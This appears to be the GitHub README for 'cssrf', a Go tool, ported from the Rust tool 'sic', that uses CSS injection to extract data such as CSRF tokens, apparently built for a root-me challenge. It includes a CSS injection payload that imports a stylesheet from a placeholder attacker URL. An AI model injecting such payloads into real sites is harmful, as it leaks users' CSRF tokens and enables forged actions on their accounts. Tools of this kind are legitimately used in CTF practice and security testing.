cssrf


Extract juicy information using CSS injection
especially csrf token 🥜


^{Basically the same thing as https://github.com/d0nutptr/sic but in Golang

I try my best to change the rust code but I lost so many time}

Show me!

All you need is launch cssrf:

cssrf [flags] # nothing crazy => cssrf -h to get flags info

Inject the malicious css:

<!-- in <style> tag -->
@import url("https://[ATTACKER_URL]/malicious.css");

And wait:

This help me solving a root-me challenge

^{Posting solution is forbidden, thus the csrf token is not integer}

Name		Name	Last commit message	Last commit date
Latest commit History 18 Commits
manual_script		manual_script
pkg/cssrf		pkg/cssrf
README.md		README.md
cssrf.gif		cssrf.gif
cssrf.go		cssrf.go
go.mod		go.mod

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

manual_script

manual_script

pkg/cssrf

pkg/cssrf

README.md

README.md

cssrf.gif

cssrf.gif

cssrf.go

cssrf.go

go.mod

go.mod

Repository files navigation

cssrf

Show me!

About

Releases 2

Packages

Languages

ariary/cssrf

Folders and files

Latest commit

History

Repository files navigation

cssrf

Show me!

About

Topics

Resources

Stars

Watchers

Forks

Languages